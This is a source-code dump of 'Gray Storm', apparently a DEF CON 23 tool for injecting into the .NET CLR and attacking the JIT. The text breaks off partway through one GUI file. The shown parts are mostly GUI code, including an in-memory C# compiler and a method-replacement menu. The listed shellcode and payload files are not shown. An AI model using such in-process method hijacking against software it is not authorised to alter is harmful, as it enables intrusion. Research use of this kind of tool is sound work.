├── .gitignore
├── CHANGELOG.txt
├── GUI
├── GrayStorm.Designer.cs
├── GrayStorm.cs
├── GrayStorm.resx
├── MethodEditor.Designer.cs
├── MethodEditor.cs
├── MethodEditor.resx
├── cSharpMethodWriter.Designer.cs
├── cSharpMethodWriter.cs
├── cSharpMethodWriter.resx
├── hierarchyViewer.Designer.cs
├── hierarchyViewer.cs
├── hierarchyViewer.resx
├── memoryHijacker.Designer.cs
├── memoryHijacker.cs
├── memoryHijacker.resx
├── shellcode.Designer.cs
├── shellcode.cs
└── shellcode.resx
├── GrayStorm.csproj
├── GrayStorm.sln
├── IL Disasm
├── ByteArrayExtensions.cs
├── ILCode.cs
├── ILInstruction.cs
├── ILOpCodeTranslator.cs
└── formatOutput.cs
├── LICENSE
├── Program.cs
├── README.md
├── assemblyHelpers
├── assemblyHelpers.cs
└── signatures.cs
├── beaEngine
├── Constants.cs
├── Disassemble.cs
├── Engine.cs
└── Structs.cs
├── dynamicC
├── dynamicMethodGenerators.cs
├── methodReplacer.cs
└── userCreatedMethods.cs
├── memoryHijacking
├── StorageInformation.cs
├── assemblyControlFlow.cs
├── domainTraverser.cs
├── methodHelpers.cs
├── methodHijacking.cs
└── methodInvoking.cs
├── objectHunter
├── foundObject.cs
└── heapObjects.cs
├── shellcodes
├── CToAsmAttackChain.cs
├── dataBox.cs
└── payloads.cs
└── testClass.cs
/.gitignore:
--------------------------------------------------------------------------------
1 | # Directories
2 | *[Dd]ebug/
3 | *[Dd]ebugPublic/
4 | *[Rr]elease/
5 | *[Rr]eleases/
6 | *x64/
7 | *x86/
8 | *build/
9 | *bld/
10 | *[Bb]in/
11 | *[Oo]bj/
12 |
13 | #FILES
14 | *.exe
15 | *.config
16 | *.pdb
17 | *.maifest
18 | *.Cache
19 | *.suo
20 | *.swp
21 | *.sdf
22 |
23 | # MSTest test Results
24 | [Tt]est[Rr]esult*/
25 | [Bb]uild[Ll]og.*
26 |
27 | # User-specific files
28 | *.suo
29 | *.user
30 | *.userosscache
31 | *.sln.docstates
--------------------------------------------------------------------------------
/CHANGELOG.txt:
--------------------------------------------------------------------------------
1 | Changelog
2 |
3 | 08.05.2015 GrayStorm-1.0
4 |
5 | * Initial release of Gray Storm for DEF CON 23
6 | * Hunt objects from the Managed Heap
7 | * Attack the .NET JIT
8 | * Rewrite a Method's raw ASM
9 | * View IL of a Method
10 | * Dump ASM from a Method
11 | * Disassemble a Method's ASM using BeaEngine
12 |
13 |
--------------------------------------------------------------------------------
/GUI/GrayStorm.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 |
10 | namespace GrayStorm
11 | {
12 | public partial class grayStorm : Form
13 | {
14 |
15 | public static TextBox _methodLabel_TB;
16 | public static TextBox _constructorLabel_TB;
17 | public static TextBox _addrOfMethod_TB;
18 | public static TextBox _addrOfConstructor_TB;
19 | hierarchyViewer _hierarchyViewer;
20 | shellcode _shellcode;
21 | public static memoryHijacker _memoryHijacker;
22 |
23 | public grayStorm()
24 | {
25 | InitializeComponent();
26 | _hierarchyViewer = hierarchyViewer1;
27 | _hierarchyViewer.loadhierarchyViewer();
28 |
29 | _shellcode = shellcodeTAB;
30 | _shellcode.loadShellcode();
31 |
32 | _memoryHijacker = memoryHijacker1;
33 |
34 | _methodLabel_TB = selectedMethod_TB;
35 | _constructorLabel_TB = selectedConstructor_TB;
36 |
37 | _addrOfMethod_TB = addrOfMethod_TB;
38 | _addrOfConstructor_TB = addrOfConstructor_TB;
39 |
40 | this.Text = "Gray Storm: Injected into CLR version " + Environment.Version.ToString().ElementAt(0);
41 | }
42 |
43 |
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/GUI/MethodEditor.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 17, 17
122 |
123 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
3 | partial class cSharpMethodWriter
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Component Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.cSharpCode_RTB = new System.Windows.Forms.RichTextBox();
32 | this.label1 = new System.Windows.Forms.Label();
33 | this.method_TB = new System.Windows.Forms.TextBox();
34 | this.class_TB = new System.Windows.Forms.TextBox();
35 | this.nameSpace_TB = new System.Windows.Forms.TextBox();
36 | this.testMethod = new System.Windows.Forms.CheckBox();
37 | this.addDll_Butt = new System.Windows.Forms.Button();
38 | this.compile_Butt = new System.Windows.Forms.Button();
39 | this.errs_RTB = new System.Windows.Forms.RichTextBox();
40 | this.SuspendLayout();
41 | //
42 | // cSharpCode_RTB
43 | //
44 | this.cSharpCode_RTB.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
45 | | System.Windows.Forms.AnchorStyles.Left)
46 | | System.Windows.Forms.AnchorStyles.Right)));
47 | this.cSharpCode_RTB.BackColor = System.Drawing.SystemColors.InactiveCaption;
48 | this.cSharpCode_RTB.Location = new System.Drawing.Point(0, 0);
49 | this.cSharpCode_RTB.Name = "cSharpCode_RTB";
50 | this.cSharpCode_RTB.Size = new System.Drawing.Size(508, 217);
51 | this.cSharpCode_RTB.TabIndex = 9;
52 | this.cSharpCode_RTB.Text = "";
53 | //
54 | // label1
55 | //
56 | this.label1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
57 | this.label1.AutoSize = true;
58 | this.label1.Location = new System.Drawing.Point(175, 252);
59 | this.label1.Name = "label1";
60 | this.label1.Size = new System.Drawing.Size(547, 13);
61 | this.label1.TabIndex = 14;
62 | this.label1.Text = "Input the namespace, class for the above. Also if testing a method input a single" +
63 | " method from the dynamic c# code";
64 | //
65 | // method_TB
66 | //
67 | this.method_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
68 | this.method_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
69 | this.method_TB.Location = new System.Drawing.Point(3, 275);
70 | this.method_TB.Name = "method_TB";
71 | this.method_TB.Size = new System.Drawing.Size(166, 20);
72 | this.method_TB.TabIndex = 13;
73 | this.method_TB.Text = "Method";
74 | //
75 | // class_TB
76 | //
77 | this.class_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
78 | this.class_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
79 | this.class_TB.Location = new System.Drawing.Point(3, 249);
80 | this.class_TB.Name = "class_TB";
81 | this.class_TB.Size = new System.Drawing.Size(166, 20);
82 | this.class_TB.TabIndex = 12;
83 | this.class_TB.Text = "Class";
84 | //
85 | // nameSpace_TB
86 | //
87 | this.nameSpace_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
88 | this.nameSpace_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
89 | this.nameSpace_TB.Location = new System.Drawing.Point(6, 223);
90 | this.nameSpace_TB.Name = "nameSpace_TB";
91 | this.nameSpace_TB.Size = new System.Drawing.Size(163, 20);
92 | this.nameSpace_TB.TabIndex = 11;
93 | this.nameSpace_TB.Text = "Namespace";
94 | //
95 | // testMethod
96 | //
97 | this.testMethod.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
98 | this.testMethod.AutoSize = true;
99 | this.testMethod.Location = new System.Drawing.Point(6, 308);
100 | this.testMethod.Name = "testMethod";
101 | this.testMethod.Size = new System.Drawing.Size(146, 17);
102 | this.testMethod.TabIndex = 18;
103 | this.testMethod.Text = "test method after creation";
104 | this.testMethod.UseVisualStyleBackColor = true;
105 | //
106 | // addDll_Butt
107 | //
108 | this.addDll_Butt.Dock = System.Windows.Forms.DockStyle.Bottom;
109 | this.addDll_Butt.Location = new System.Drawing.Point(0, 331);
110 | this.addDll_Butt.Name = "addDll_Butt";
111 | this.addDll_Butt.Size = new System.Drawing.Size(511, 24);
112 | this.addDll_Butt.TabIndex = 17;
113 | this.addDll_Butt.Text = "Add Dlls";
114 | this.addDll_Butt.UseVisualStyleBackColor = true;
115 | this.addDll_Butt.Click += new System.EventHandler(this.addDll_Butt_Click);
116 | //
117 | // compile_Butt
118 | //
119 | this.compile_Butt.Dock = System.Windows.Forms.DockStyle.Bottom;
120 | this.compile_Butt.Location = new System.Drawing.Point(0, 355);
121 | this.compile_Butt.Name = "compile_Butt";
122 | this.compile_Butt.Size = new System.Drawing.Size(511, 25);
123 | this.compile_Butt.TabIndex = 16;
124 | this.compile_Butt.Text = "Compile";
125 | this.compile_Butt.UseVisualStyleBackColor = true;
126 | this.compile_Butt.Click += new System.EventHandler(this.compile_Butt_Click);
127 | //
128 | // errs_RTB
129 | //
130 | this.errs_RTB.BackColor = System.Drawing.SystemColors.InactiveCaption;
131 | this.errs_RTB.Dock = System.Windows.Forms.DockStyle.Bottom;
132 | this.errs_RTB.Location = new System.Drawing.Point(0, 380);
133 | this.errs_RTB.Name = "errs_RTB";
134 | this.errs_RTB.RightToLeft = System.Windows.Forms.RightToLeft.No;
135 | this.errs_RTB.Size = new System.Drawing.Size(511, 54);
136 | this.errs_RTB.TabIndex = 15;
137 | this.errs_RTB.Text = "";
138 | //
139 | // cSharpMethodWriter
140 | //
141 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
142 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
143 | this.Controls.Add(this.testMethod);
144 | this.Controls.Add(this.addDll_Butt);
145 | this.Controls.Add(this.compile_Butt);
146 | this.Controls.Add(this.errs_RTB);
147 | this.Controls.Add(this.label1);
148 | this.Controls.Add(this.method_TB);
149 | this.Controls.Add(this.class_TB);
150 | this.Controls.Add(this.nameSpace_TB);
151 | this.Controls.Add(this.cSharpCode_RTB);
152 | this.Name = "cSharpMethodWriter";
153 | this.Size = new System.Drawing.Size(511, 434);
154 | this.ResumeLayout(false);
155 | this.PerformLayout();
156 |
157 | }
158 |
159 | #endregion
160 |
161 | private System.Windows.Forms.RichTextBox cSharpCode_RTB;
162 | private System.Windows.Forms.Label label1;
163 | private System.Windows.Forms.TextBox method_TB;
164 | private System.Windows.Forms.TextBox class_TB;
165 | private System.Windows.Forms.TextBox nameSpace_TB;
166 | private System.Windows.Forms.CheckBox testMethod;
167 | private System.Windows.Forms.Button addDll_Butt;
168 | private System.Windows.Forms.Button compile_Butt;
169 | private System.Windows.Forms.RichTextBox errs_RTB;
170 |
171 | }
172 | }
173 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.CSharp;
2 | using System;
3 | using System.CodeDom.Compiler;
4 | using System.Collections.Generic;
5 | using System.ComponentModel;
6 | using System.Data;
7 | using System.Drawing;
8 | using System.Linq;
9 | using System.Reflection;
10 | using System.Text;
11 | using System.Windows.Forms;
12 |
13 | namespace GrayStorm
14 | {
15 | public partial class cSharpMethodWriter : UserControl
16 | {
17 | private List assemblyReferences = new List();
18 | public cSharpMethodWriter()
19 | {
20 | InitializeComponent();
21 | cSharpCode_RTB.Text = "using System; \n namespace customCSharp \n { \t\n class customClass \t\n { \t\n } \n }";
22 | nameSpace_TB.Text = "customCSharp";
23 | class_TB.Text = "customClass";
24 | }
25 |
26 |
27 | //TODO FIX METHODS APPEARING MORE THAN ONCE IN LISTING
28 | private void compile_Butt_Click(object sender, EventArgs e)
29 | {
30 | MethodInfo compiledCSharp;
31 | CSharpCodeProvider provider = new CSharpCodeProvider();
32 | CompilerParameters parameters = new CompilerParameters();
33 | parameters.GenerateInMemory = true;
34 |
35 | foreach (string refAsm in assemblyReferences)
36 | parameters.ReferencedAssemblies.Add(refAsm);
37 |
38 | foreach (Assembly assembly in AppDomain.CurrentDomain.GetAssemblies())
39 | {
40 | try
41 | {
42 | string location = assembly.Location;
43 | if (!String.IsNullOrEmpty(location))
44 | {
45 | parameters.ReferencedAssemblies.Add(location);
46 | }
47 | }
48 | catch (NotSupportedException)
49 | {
50 | // this happens for dynamic assemblies, so just ignore it.
51 |
52 | }
53 | }
54 |
55 | CompilerResults results = provider.CompileAssemblyFromSource(parameters, cSharpCode_RTB.Text);
56 | errs_RTB.Clear();
57 |
58 | if (results.Errors.HasErrors)
59 | {
60 | foreach (CompilerError error in results.Errors)
61 | {
62 | errs_RTB.AppendText(String.Format("Error Line {0} -> ({1}): {2}\n", error.Line, error.ErrorNumber, error.ErrorText));
63 | }
64 | return;
65 | }
66 |
67 | Type binaryFunction = results.CompiledAssembly.GetType(nameSpace_TB.Text + "." + class_TB.Text);
68 | if (binaryFunction == null)
69 | {
70 | errs_RTB.AppendText("Adding Methods failed... no existing namespace and class");
71 | }
72 | else
73 | {
74 | if (testMethod.Checked)
75 | {
76 | compiledCSharp = binaryFunction.GetMethod(method_TB.Text, BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.Public | BindingFlags.DeclaredOnly);
77 | if (compiledCSharp == null)
78 | {
79 | errs_RTB.AppendText("Method does not exist");
80 | return;
81 | }
82 | else
83 | compiledCSharp.Invoke(null, new object[] { });
84 | }
85 | foreach (MethodInfo method in binaryFunction.GetMethods(BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Public | BindingFlags.Instance | BindingFlags.DeclaredOnly))
86 | dynamicC.userCreatedMethods.userCreatedMethodsList.Add(method);
87 |
88 | errs_RTB.AppendText("Methods added to userCreatedMethodsList.\n");
89 | grayStorm._memoryHijacker.dynamicMethods_LB.Items.Clear();
90 | grayStorm._memoryHijacker.dynamicMethods_LB.Items.AddRange(dynamicC.userCreatedMethods.userCreatedMethodsList.ToArray());
91 | grayStorm._memoryHijacker.dynamicMethods_LB.Refresh();
92 |
93 | }
94 | }
95 |
96 | private void addDll_Butt_Click(object sender, EventArgs e)
97 | {
98 | System.Windows.Forms.OpenFileDialog file = new OpenFileDialog();
99 | file.Multiselect = true;
100 | file.Filter = "dll files (*.dll)|*.dll";
101 | file.Title = "Select a dll/exe code base";
102 | file.ShowDialog();
103 | assemblyReferences.Add(file.FileName);
104 | }
105 | }
106 | }
107 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
3 | partial class hierarchyViewer
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Component Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.components = new System.ComponentModel.Container();
32 | this.hierarchyViewer_TN = new System.Windows.Forms.TreeView();
33 | this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
34 | this.dumpAssemblyToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
35 | this.dumpToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
36 | this.disassembleToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
37 | this.reDumpToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
38 | this.fireMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
39 | this.normalToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
40 | this.withINT3ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
41 | this.restoreMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
42 | this.showILCodeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
43 | this.replaceMethodWithCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
44 | this.cacheReplacerMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
45 | this.refreshDomain_BT = new System.Windows.Forms.Button();
46 | this.panel1 = new System.Windows.Forms.Panel();
47 | this.contextMenuStrip1.SuspendLayout();
48 | this.panel1.SuspendLayout();
49 | this.SuspendLayout();
50 | //
51 | // hierarchyViewer_TN
52 | //
53 | this.hierarchyViewer_TN.ContextMenuStrip = this.contextMenuStrip1;
54 | this.hierarchyViewer_TN.Dock = System.Windows.Forms.DockStyle.Fill;
55 | this.hierarchyViewer_TN.Location = new System.Drawing.Point(0, 25);
56 | this.hierarchyViewer_TN.Name = "hierarchyViewer_TN";
57 | this.hierarchyViewer_TN.Size = new System.Drawing.Size(291, 204);
58 | this.hierarchyViewer_TN.TabIndex = 0;
59 | this.hierarchyViewer_TN.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.hierarchyViewer_TN_AfterSelect);
60 | //
61 | // contextMenuStrip1
62 | //
63 | this.contextMenuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
64 | this.dumpAssemblyToolStripMenuItem,
65 | this.fireMethodToolStripMenuItem,
66 | this.restoreMethodToolStripMenuItem,
67 | this.showILCodeToolStripMenuItem,
68 | this.replaceMethodWithCustomCToolStripMenuItem,
69 | this.cacheReplacerMethodToolStripMenuItem});
70 | this.contextMenuStrip1.Name = "contextMenuStrip1";
71 | this.contextMenuStrip1.Size = new System.Drawing.Size(252, 136);
72 | //
73 | // dumpAssemblyToolStripMenuItem
74 | //
75 | this.dumpAssemblyToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
76 | this.dumpToolStripMenuItem,
77 | this.disassembleToolStripMenuItem,
78 | this.reDumpToolStripMenuItem});
79 | this.dumpAssemblyToolStripMenuItem.Name = "dumpAssemblyToolStripMenuItem";
80 | this.dumpAssemblyToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
81 | this.dumpAssemblyToolStripMenuItem.Text = "Dump Assembly";
82 | //
83 | // dumpToolStripMenuItem
84 | //
85 | this.dumpToolStripMenuItem.Name = "dumpToolStripMenuItem";
86 | this.dumpToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
87 | this.dumpToolStripMenuItem.Text = "Dump";
88 | this.dumpToolStripMenuItem.Click += new System.EventHandler(this.dumpToolStripMenuItem_Click);
89 | //
90 | // disassembleToolStripMenuItem
91 | //
92 | this.disassembleToolStripMenuItem.Name = "disassembleToolStripMenuItem";
93 | this.disassembleToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
94 | this.disassembleToolStripMenuItem.Text = "Disassemble";
95 | this.disassembleToolStripMenuItem.Click += new System.EventHandler(this.disassembleToolStripMenuItem_Click);
96 | //
97 | // reDumpToolStripMenuItem
98 | //
99 | this.reDumpToolStripMenuItem.Name = "reDumpToolStripMenuItem";
100 | this.reDumpToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
101 | this.reDumpToolStripMenuItem.Text = "ReDump";
102 | this.reDumpToolStripMenuItem.Click += new System.EventHandler(this.reDumpToolStripMenuItem_Click);
103 | //
104 | // fireMethodToolStripMenuItem
105 | //
106 | this.fireMethodToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
107 | this.normalToolStripMenuItem,
108 | this.withINT3ToolStripMenuItem});
109 | this.fireMethodToolStripMenuItem.Name = "fireMethodToolStripMenuItem";
110 | this.fireMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
111 | this.fireMethodToolStripMenuItem.Text = "Fire Method";
112 | //
113 | // normalToolStripMenuItem
114 | //
115 | this.normalToolStripMenuItem.Name = "normalToolStripMenuItem";
116 | this.normalToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
117 | this.normalToolStripMenuItem.Text = "Normal";
118 | this.normalToolStripMenuItem.Click += new System.EventHandler(this.normalToolStripMenuItem_Click);
119 | //
120 | // withINT3ToolStripMenuItem
121 | //
122 | this.withINT3ToolStripMenuItem.Name = "withINT3ToolStripMenuItem";
123 | this.withINT3ToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
124 | this.withINT3ToolStripMenuItem.Text = "With INT 3";
125 | this.withINT3ToolStripMenuItem.Click += new System.EventHandler(this.withINT3ToolStripMenuItem_Click);
126 | //
127 | // restoreMethodToolStripMenuItem
128 | //
129 | this.restoreMethodToolStripMenuItem.Name = "restoreMethodToolStripMenuItem";
130 | this.restoreMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
131 | this.restoreMethodToolStripMenuItem.Text = "Restore Method";
132 | this.restoreMethodToolStripMenuItem.Click += new System.EventHandler(this.restoreMethodToolStripMenuItem_Click);
133 | //
134 | // showILCodeToolStripMenuItem
135 | //
136 | this.showILCodeToolStripMenuItem.Name = "showILCodeToolStripMenuItem";
137 | this.showILCodeToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
138 | this.showILCodeToolStripMenuItem.Text = "Show IL Code";
139 | this.showILCodeToolStripMenuItem.Click += new System.EventHandler(this.showILCodeToolStripMenuItem_Click);
140 | //
141 | // replaceMethodWithCustomCToolStripMenuItem
142 | //
143 | this.replaceMethodWithCustomCToolStripMenuItem.Name = "replaceMethodWithCustomCToolStripMenuItem";
144 | this.replaceMethodWithCustomCToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
145 | this.replaceMethodWithCustomCToolStripMenuItem.Text = "Replace Method With Custom C#";
146 | this.replaceMethodWithCustomCToolStripMenuItem.Click += new System.EventHandler(this.replaceMethodWithCustomCToolStripMenuItem_Click);
147 | //
148 | // cacheReplacerMethodToolStripMenuItem
149 | //
150 | this.cacheReplacerMethodToolStripMenuItem.Name = "cacheReplacerMethodToolStripMenuItem";
151 | this.cacheReplacerMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
152 | this.cacheReplacerMethodToolStripMenuItem.Text = "Cache Replacer Method";
153 | this.cacheReplacerMethodToolStripMenuItem.Click += new System.EventHandler(this.cacheReplacerMethodToolStripMenuItem_Click);
154 | //
155 | // refreshDomain_BT
156 | //
157 | this.refreshDomain_BT.Dock = System.Windows.Forms.DockStyle.Top;
158 | this.refreshDomain_BT.Location = new System.Drawing.Point(0, 0);
159 | this.refreshDomain_BT.Name = "refreshDomain_BT";
160 | this.refreshDomain_BT.Size = new System.Drawing.Size(291, 25);
161 | this.refreshDomain_BT.TabIndex = 0;
162 | this.refreshDomain_BT.Text = "Refresh Domain";
163 | this.refreshDomain_BT.UseVisualStyleBackColor = true;
164 | this.refreshDomain_BT.Click += new System.EventHandler(this.refreshDomain_BT_Click);
165 | //
166 | // panel1
167 | //
168 | this.panel1.Controls.Add(this.hierarchyViewer_TN);
169 | this.panel1.Controls.Add(this.refreshDomain_BT);
170 | this.panel1.Dock = System.Windows.Forms.DockStyle.Fill;
171 | this.panel1.Location = new System.Drawing.Point(0, 0);
172 | this.panel1.Name = "panel1";
173 | this.panel1.Size = new System.Drawing.Size(291, 229);
174 | this.panel1.TabIndex = 1;
175 | //
176 | // hierarchyViewer
177 | //
178 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
179 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
180 | this.Controls.Add(this.panel1);
181 | this.Name = "hierarchyViewer";
182 | this.Size = new System.Drawing.Size(291, 229);
183 | this.contextMenuStrip1.ResumeLayout(false);
184 | this.panel1.ResumeLayout(false);
185 | this.ResumeLayout(false);
186 |
187 | }
188 |
189 | #endregion
190 |
191 | private System.Windows.Forms.TreeView hierarchyViewer_TN;
192 | private System.Windows.Forms.Button refreshDomain_BT;
193 | private System.Windows.Forms.ContextMenuStrip contextMenuStrip1;
194 | private System.Windows.Forms.ToolStripMenuItem dumpAssemblyToolStripMenuItem;
195 | private System.Windows.Forms.ToolStripMenuItem dumpToolStripMenuItem;
196 | private System.Windows.Forms.ToolStripMenuItem disassembleToolStripMenuItem;
197 | private System.Windows.Forms.ToolStripMenuItem fireMethodToolStripMenuItem;
198 | private System.Windows.Forms.ToolStripMenuItem normalToolStripMenuItem;
199 | private System.Windows.Forms.ToolStripMenuItem withINT3ToolStripMenuItem;
200 | private System.Windows.Forms.ToolStripMenuItem reDumpToolStripMenuItem;
201 | private System.Windows.Forms.ToolStripMenuItem restoreMethodToolStripMenuItem;
202 | private System.Windows.Forms.ToolStripMenuItem showILCodeToolStripMenuItem;
203 | private System.Windows.Forms.ToolStripMenuItem replaceMethodWithCustomCToolStripMenuItem;
204 | private System.Windows.Forms.ToolStripMenuItem cacheReplacerMethodToolStripMenuItem;
205 | private System.Windows.Forms.Panel panel1;
206 | }
207 | }
208 |
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
13 | public partial class hierarchyViewer : UserControl
14 | {
15 | #region events
16 | public delegate void targetMethod(MethodInfo targetMethod, TreeNode TN);
17 | public event targetMethod selectedMethod;
18 |
19 | public delegate void targetConstructor(ConstructorInfo targetConstructor, TreeNode TN);
20 | public event targetConstructor selectedConstructor;
21 |
22 | public hierarchyViewer()
23 | {
24 | InitializeComponent();
25 | }
26 |
27 | void hierarchyViewer_selectedMethod(MethodInfo targetMethod, TreeNode TN)
28 | {
29 | domainTraverser.currentMethod = targetMethod;
30 | GrayStorm.grayStorm._methodLabel_TB.Text = TN.Parent.Text + "." + targetMethod.Name;
31 | grayStorm._addrOfMethod_TB.Text = "";
32 | }
33 |
34 | void hierarchyViewer_selectedConstructor(ConstructorInfo targetConstructor, TreeNode TN)
35 | {
36 | domainTraverser.currentConstructor = targetConstructor;
37 | GrayStorm.grayStorm._constructorLabel_TB.Text = TN.Parent.Text + "." + TN.Text;
38 | System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(targetConstructor.MethodHandle);
39 | grayStorm._addrOfConstructor_TB.Text = targetConstructor.MethodHandle.GetFunctionPointer().ToString("X");
40 | }
41 |
42 | private void refreshDomain_BT_Click(object sender, EventArgs e)
43 | {
44 | domainAssemblies.Clear();
45 | domainClasses.Clear();
46 | methods.Clear();
47 | constructors.Clear();
48 | hierarchyViewer_TN.Nodes.Clear();
49 | buildTree();
50 | }
51 |
52 | #endregion events
53 |
54 | #region init
55 | public void loadhierarchyViewer()
56 | {
57 | selectedMethod += hierarchyViewer_selectedMethod;
58 | selectedConstructor += hierarchyViewer_selectedConstructor;
59 | buildTree();
60 | }
61 | #endregion init
62 |
63 | #region treeNode
64 | System.Collections.Generic.Dictionary domainAssemblies = new Dictionary();
65 | System.Collections.Generic.Dictionary domainClasses = new Dictionary();
66 | System.Collections.Generic.Dictionary methods = new Dictionary();
67 | System.Collections.Generic.Dictionary constructors = new Dictionary();
68 | System.Collections.ArrayList assembliesCreated = new System.Collections.ArrayList();
69 |
70 | public void buildTree()
71 | {
72 | AppDomain myDomain = AppDomain.CurrentDomain;
73 | Assembly[] allAssemblies = myDomain.GetAssemblies();
74 |
75 | foreach (Assembly asm in allAssemblies)
76 | {
77 | string assemblyName = asm.FullName.ToString();
